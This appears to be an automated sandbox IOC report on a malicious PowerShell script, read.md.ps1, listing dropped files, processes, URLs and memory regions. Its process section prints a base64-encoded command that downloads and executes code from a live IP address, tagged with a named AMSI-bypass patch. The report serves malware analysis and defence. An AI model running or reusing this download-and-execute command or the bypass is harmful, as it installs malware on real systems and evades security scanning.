IOC Report
read.md.ps1

loading gif

Files

File Path
Type
Category
Malicious
read.md.ps1
ASCII text, with very long lines (386)
initial sample
malicious
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.0.cs
Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.out
Unicode text, UTF-8 (with BOM) text, with very long lines (460), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\342xs1bj\CSCE2520CC5ECF449C4902DF16D49DC74DD.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RESC0D1.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Fri Nov 1 09:05:35 2024, 1st section name ".debug$S"
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40y15puv.43k.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4ozuldc.jzv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4yy1mn5.b14.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nofcnku1.sz2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxzut45k.fr0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfcckfdp.4s5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5TKV86GLOWO0TV3ZMPZ.temp
data
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\read.md.ps1"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\342xs1bj\342xs1bj.cmdline"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADcALgAxADIAMAAuADEAMQAzAC4AMQAyADUALwByAGUAYQBkAG0AZQAuAG0AZAAnACkA=#Rasta-mouses Amsi-Scan-Buffer patch \n
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADcALgAxADIAMAAuADEAMQAzAC4AMQAyADUALwByAGUAYQBkAG0AZQAuAG0AZAAnACkA=
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC0D1.tmp" "c:\Users\user\AppData\Local\Temp\342xs1bj\CSCE2520CC5ECF449C4902DF16D49DC74DD.TMP"

URLs

Name
IP
Malicious
http://87.120.113.125/readme.md
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 5 hidden URLs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
16284268000
heap
page read and write
B6540FB000
stack
page read and write
162845D0000
heap
page read and write
1628427D000
heap
page read and write
B653595000
stack
page read and write
20647D5000
stack
page read and write
16287130000
direct allocation
page read and write
EFFC73F000
stack
page read and write
1FBC9CA1000
heap
page read and write
B653DF8000
stack
page read and write
1FBC9B20000
heap
page read and write
EFFBFEE000
stack
page read and write
1FBC9CBD000
heap
page read and write
B653A7E000
stack
page read and write
23BC10FF000
heap
page read and write
7FFAAC383000
trusted library allocation
page execute and read and write
B653F7E000
stack
page read and write
23BB9100000
trusted library allocation
page read and write
12918461000
heap
page read and write
1FBCBB4A000
trusted library allocation
page read and write
162871B0000
direct allocation
page read and write
1FBC9C60000
heap
page read and write
1FBCBB6E000
trusted library allocation
page read and write
7FFAAC6F0000
trusted library allocation
page read and write
1FBC9C68000
heap
page read and write
12932A2D000
heap
page read and write
23BA726C000
heap
page read and write
23BC13E0000
heap
page read and write
23BC1400000
heap
page read and write
1FBC9CE5000
heap
page read and write
23BC1527000
heap
page read and write
2064EB9000
stack
page read and write
16284550000
heap
page read and write
129182A0000
heap
page read and write
2064BFD000
stack
page read and write
7FFAAC55A000
trusted library allocation
page read and write
162842D5000
heap
page read and write
EFFC53E000
stack
page read and write
7FFB167B0000
unkown
page read and write
162842FE000
heap
page read and write
1FBC9EB4000
heap
page read and write
7FFAAC560000
trusted library allocation
page execute and read and write
1FBC9CAB000
heap
page read and write
23BC13D7000
heap
page execute and read and write
1FBE3C6A000
heap
page read and write
23BC1235000
heap
page read and write
23BA7170000
heap
page read and write
23BC1535000
heap
page read and write
7FFAAC45C000
trusted library allocation
page execute and read and write
7FFAAC520000
trusted library allocation
page read and write
1ED6E239000
heap
page read and write
16284295000
heap
page read and write
23BA725C000
heap
page read and write
1ED6E0C0000
heap
page read and write
23BA8D40000
heap
page read and write
23BA7460000
trusted library allocation
page read and write
1FBCBB2D000
trusted library allocation
page read and write
16284507000
direct allocation
page read and write
B653C7C000
stack
page read and write
7FFB167B2000
unkown
page readonly
1FBCB710000
heap
page execute and read and write
7FFAAC5C0000
trusted library allocation
page read and write
7FFAAC38D000
trusted library allocation
page execute and read and write
7FFAAC542000
trusted library allocation
page read and write
7FFAAC600000
trusted library allocation
page read and write
162871B5000
direct allocation
page read and write
1ED6E1A0000
heap
page read and write
162842AF000
heap
page read and write
7FFAAC384000
trusted library allocation
page read and write
7FFAAC420000
trusted library allocation
page execute and read and write
7FFAAC610000
trusted library allocation
page read and write
1FBC9CE7000
heap
page read and write
1FBE3E20000
heap
page read and write
12919CD0000
trusted library allocation
page read and write
162842F5000
heap
page read and write
23BA94B1000
trusted library allocation
page read and write
1FBCBB5B000
trusted library allocation
page read and write
1628451D000
direct allocation
page read and write
23BC153A000
heap
page read and write
7FFAAC515000
trusted library allocation
page read and write
20650BF000
stack
page read and write
16284279000
heap
page read and write
16284250000
heap
page read and write
7FFAAC680000
trusted library allocation
page read and write
1FBC9DD0000
heap
page readonly
1FBE3C20000
heap
page read and write
1292A403000
trusted library allocation
page read and write
7FFAAC700000
trusted library allocation
page read and write
12932A43000
heap
page read and write
129183F0000
heap
page read and write
2064C7E000
stack
page read and write
1291850E000
heap
page read and write
23BA7420000
heap
page read and write
1FBDBB21000
trusted library allocation
page read and write
23BC1549000
heap
page read and write
7FFAAC450000
trusted library allocation
page read and write
2064E3E000
stack
page read and write
1291A3D6000
trusted library allocation
page read and write
2064CFE000
stack
page read and write
12918435000
heap
page read and write
5FC3DFE000
stack
page read and write
23BA71B0000
heap
page read and write
7FFAAC660000
trusted library allocation
page read and write
2064FBA000
stack
page read and write
1291A414000
trusted library allocation
page read and write
1FBCBB11000
trusted library allocation
page read and write
1FBC9D60000
heap
page read and write
129329C0000
heap
page read and write
7FFAAC522000
trusted library allocation
page read and write
B653E7A000
stack
page read and write
7FFAAC650000
trusted library allocation
page read and write
B653B7E000
stack
page read and write
1291A190000
heap
page execute and read and write
162842B6000
heap
page read and write
129183D4000
heap
page read and write
7FFAAC582000
trusted library allocation
page read and write
2064D7E000
stack
page read and write
23BA917B000
trusted library allocation
page read and write
1FBC9C00000
heap
page read and write
23BA72B5000
heap
page read and write
12918454000
heap
page read and write
311FBFF000
stack
page read and write
162871B3000
direct allocation
page read and write
23BA9EB1000
trusted library allocation
page read and write
1FBDBB17000
trusted library allocation
page read and write
1FBCB7C0000
heap
page read and write
EFFC47E000
stack
page read and write
16284540000
heap
page read and write
5FC3CFC000
stack
page read and write
7FFAAC630000
trusted library allocation
page read and write
23BA71F4000
heap
page read and write
23BB90F1000
trusted library allocation
page read and write
B6535DE000
stack
page read and write
7FFAAC535000
trusted library allocation
page read and write
7FFAAC3A3000
trusted library allocation
page execute and read and write
7FFB167B0000
unkown
page read and write
129329E7000
heap
page read and write
1FBC9D80000
trusted library section
page read and write
23BA7475000
heap
page read and write
1FBC9CA7000
heap
page read and write
23BC153D000
heap
page read and write
2064B7E000
stack
page read and write
23BAAD97000
trusted library allocation
page read and write
23BC1523000
heap
page read and write
23BC13B0000
trusted library section
page read and write
7FFAAC456000
trusted library allocation
page read and write
2064A7D000
stack
page read and write
B65407E000
stack
page read and write
129183D0000
heap
page read and write
1292A399000
trusted library allocation
page read and write
1FBC9DA0000
trusted library allocation
page read and write
B653D77000
stack
page read and write
12919D00000
heap
page readonly
EFFC6BE000
stack
page read and write
162842BE000
heap
page read and write
1291A420000
trusted library allocation
page read and write
7FFAAC382000
trusted library allocation
page read and write
7FFAAC3BB000
trusted library allocation
page read and write
1291846B000
heap
page read and write
162842D6000
heap
page read and write
162842E7000
heap
page read and write
B65397E000
stack
page read and write
162845D4000
heap
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
1291A391000
trusted library allocation
page read and write
23BAAABA000
trusted library allocation
page read and write
7FFB167B5000
unkown
page readonly
7FFAAC5A0000
trusted library allocation
page read and write
23BA8C73000
trusted library allocation
page read and write
7FFAAC430000
trusted library allocation
page read and write
16284273000
heap
page read and write
1ED6E1C4000
heap
page read and write
162842E1000
heap
page read and write
B654ACE000
stack
page read and write
12919CF0000
trusted library allocation
page read and write
16284570000
direct allocation
page read and write
16287170000
direct allocation
page read and write
12919D80000
trusted library allocation
page read and write
B653AFB000
stack
page read and write
7FFAAC460000
trusted library allocation
page execute and read and write
1291A3B1000
trusted library allocation
page read and write
7FFAAC690000
trusted library allocation
page read and write
162842B7000
heap
page read and write
7FFAAC570000
trusted library allocation
page execute and read and write
16284450000
heap
page read and write
23BC12F4000
heap
page read and write
23BC1275000
heap
page read and write
5FC3EFF000
stack
page read and write
7FFAAC480000
trusted library allocation
page execute and read and write
129323B0000
heap
page read and write
B6538FE000
stack
page read and write
1FBC9CEA000
heap
page read and write
EFFC4F8000
stack
page read and write
23BA8D70000
heap
page execute and read and write
7FFAAC710000
trusted library allocation
page read and write
23BAAE5C000
trusted library allocation
page read and write
1FBCB7C4000
heap
page read and write
16284257000
heap
page read and write
1FBC9C93000
heap
page read and write
1FBC9DF0000
heap
page read and write
23BC1538000
heap
page read and write
1ED6E1D0000
heap
page read and write
2064DF8000
stack
page read and write
1FBC9C20000
heap
page read and write
EFFC2FD000
stack
page read and write
23BA7289000
heap
page read and write
7FFAAC41C000
trusted library allocation
page execute and read and write
23BC1210000
heap
page read and write
16284430000
heap
page read and write
1292A397000
trusted library allocation
page read and write
23BA90F1000
trusted library allocation
page read and write
1FBC9EB0000
heap
page read and write
7FFAAC373000
trusted library allocation
page read and write
162842FE000
heap
page read and write
162842A1000
heap
page read and write
23BA8CB0000
trusted library allocation
page read and write
23BA72BD000
heap
page read and write
1FBCBB9A000
trusted library allocation
page read and write
162842A6000
heap
page read and write
23BC123A000
heap
page read and write
7DF432740000
trusted library allocation
page execute and read and write
1FBC9C8B000
heap
page read and write
1FBC9C9C000
heap
page read and write
162842C5000
heap
page read and write
1ED6E230000
heap
page read and write
EFFC7BE000
stack
page read and write
129184AE000
heap
page read and write
1291A42E000
trusted library allocation
page read and write
23BA7430000
trusted library allocation
page read and write
1FBC9C8E000
heap
page read and write
23BA8C30000
heap
page execute and read and write
7FFAAC640000
trusted library allocation
page read and write
23BAA8B1000
trusted library allocation
page read and write
7FFAAC540000
trusted library allocation
page read and write
23BA71E8000
heap
page read and write
7FFB167B0000
unkown
page read and write
1291A3ED000
trusted library allocation
page read and write
23BA9322000
trusted library allocation
page read and write
23BC12AB000
heap
page read and write
16284298000
heap
page read and write
23BA7271000
heap
page read and write
162871C1000
direct allocation
page read and write
23BA7150000
heap
page read and write
B653D7E000
stack
page read and write
2064F3E000
stack
page read and write
23BAAB15000
trusted library allocation
page read and write
23BAAA8E000
trusted library allocation
page read and write
1FBDBB11000
trusted library allocation
page read and write
12918456000
heap
page read and write
1FBCBB9E000
trusted library allocation
page read and write
311F7F8000
stack
page read and write
16284350000
heap
page read and write
7FFAAC4A0000
trusted library allocation
page execute and read and write
23BA8C20000
heap
page readonly
7FFAAC6B0000
trusted library allocation
page read and write
162842E1000
heap
page read and write
23BC1273000
heap
page read and write
7FFAAC440000
trusted library allocation
page execute and read and write
23BC1546000
heap
page read and write
23BA7470000
heap
page read and write
7FFAAC446000
trusted library allocation
page execute and read and write
B65387E000
stack
page read and write
7FFAAC3AD000
trusted library allocation
page execute and read and write
7FFAAC3B0000
trusted library allocation
page read and write
23BA7425000
heap
page read and write
23BA742A000
heap
page read and write
16287150000
direct allocation
page read and write
12932A0D000
heap
page read and write
B6539FD000
stack
page read and write
16287190000
direct allocation
page read and write
7FFAAC364000
trusted library allocation
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
1FBC9DE0000
trusted library allocation
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
162842FE000
heap
page read and write
162871B3000
direct allocation
page read and write
7FFAAC3A2000
trusted library allocation
page read and write
1291A3B5000
trusted library allocation
page read and write
1FBE3C6C000
heap
page read and write
23BA7140000
heap
page read and write
16287110000
direct allocation
page read and write
16284503000
direct allocation
page read and write
12932A36000
heap
page read and write
23BC1260000
heap
page read and write
12932A3C000
heap
page read and write
7FFAAC36D000
trusted library allocation
page execute and read and write
7FFAAC486000
trusted library allocation
page execute and read and write
23BC14E6000
heap
page read and write
7FFB16790000
unkown
page readonly
7FFAAC370000
trusted library allocation
page read and write
12918420000
heap
page read and write
1FBE3C96000
heap
page read and write
7FFAAC584000
trusted library allocation
page read and write
206503E000
stack
page read and write
1FBE3DF0000
heap
page execute and read and write
23BA728B000
heap
page read and write
7FFAAC466000
trusted library allocation
page execute and read and write
23BB9163000
trusted library allocation
page read and write
12919DA0000
heap
page read and write
129184A9000
heap
page read and write
7FFAAC670000
trusted library allocation
page read and write
EFFC5B9000
stack
page read and write
7FFAAC410000
trusted library allocation
page read and write
1FBCBB4F000
trusted library allocation
page read and write
23BA8C70000
trusted library allocation
page read and write
1FBC9DC0000
trusted library allocation
page read and write
23BC14E0000
heap
page read and write
12918410000
trusted library section
page read and write
1FBE3C99000
heap
page read and write
7FFAAC3A4000
trusted library allocation
page read and write
129183A0000
heap
page read and write
162871C1000
direct allocation
page read and write
B653EFE000
stack
page read and write
7FFAAC363000
trusted library allocation
page execute and read and write
EFFBEE5000
stack
page read and write
7FFAAC5E0000
trusted library allocation
page read and write
1292A391000
trusted library allocation
page read and write
1291A1D0000
heap
page read and write
7FFAAC390000
trusted library allocation
page read and write
7FFAAC4C0000
trusted library allocation
page execute and read and write
EFFC3FE000
stack
page read and write
2064AFF000
stack
page read and write
1FBE3C90000
heap
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
7FFB16791000
unkown
page execute read
7FFAAC6C0000
trusted library allocation
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
12918427000
heap
page read and write
23BC12CD000
heap
page read and write
EFFC63E000
stack
page read and write
EFFC37F000
stack
page read and write
7FFAAC720000
trusted library allocation
page read and write
7FFAAC500000
trusted library allocation
page read and write
1FBE3C38000
heap
page read and write
16284294000
heap
page read and write
7FFAAC393000
trusted library allocation
page read and write
12918380000
heap
page read and write
1291A380000
heap
page execute and read and write
7FFAAC362000
trusted library allocation
page read and write
23BA71E0000
heap
page read and write
16284290000
heap
page read and write
B653BFE000
stack
page read and write
311F9FF000
stack
page read and write
1628428E000
heap
page read and write
23BA8DA0000
heap
page read and write
162842E6000
heap
page read and write
12918463000
heap
page read and write
23BC13D0000
heap
page execute and read and write
16284590000
direct allocation
page read and write
7FFAAC416000
trusted library allocation
page read and write
7FFB167A6000
unkown
page readonly
7FFAAC43C000
trusted library allocation
page execute and read and write
7FFAAC590000
trusted library allocation
page execute and read and write
7FFAAC551000
trusted library allocation
page read and write
B653CF9000
stack
page read and write
16284500000
direct allocation
page read and write
12932A0B000
heap
page read and write
1ED6E1C0000
heap
page read and write
162842AF000
heap
page read and write
162844C0000
direct allocation
page read and write
12932A38000
heap
page read and write
EFFC27E000
stack
page read and write
7FFAAC436000
trusted library allocation
page read and write
162871B5000
direct allocation
page read and write
7FFAAC5D0000
trusted library allocation
page read and write
1FBE3C3E000
heap
page read and write
23BC122E000
heap
page read and write
1FBDBB19000
trusted library allocation
page read and write
12918481000
heap
page read and write
1FBDBB83000
trusted library allocation
page read and write
23BB92A6000
trusted library allocation
page read and write
162842EF000
heap
page read and write
12919DA4000
heap
page read and write
16284544000
heap
page read and write
23BAAE60000
trusted library allocation
page read and write
1292A3A1000
trusted library allocation
page read and write
1628451B000
direct allocation
page read and write
16284520000
direct allocation
page read and write
162842FB000
heap
page read and write
EFFBF6E000
stack
page read and write
7FFAAC620000
trusted library allocation
page read and write
There are 371 hidden memdumps, click here to show them.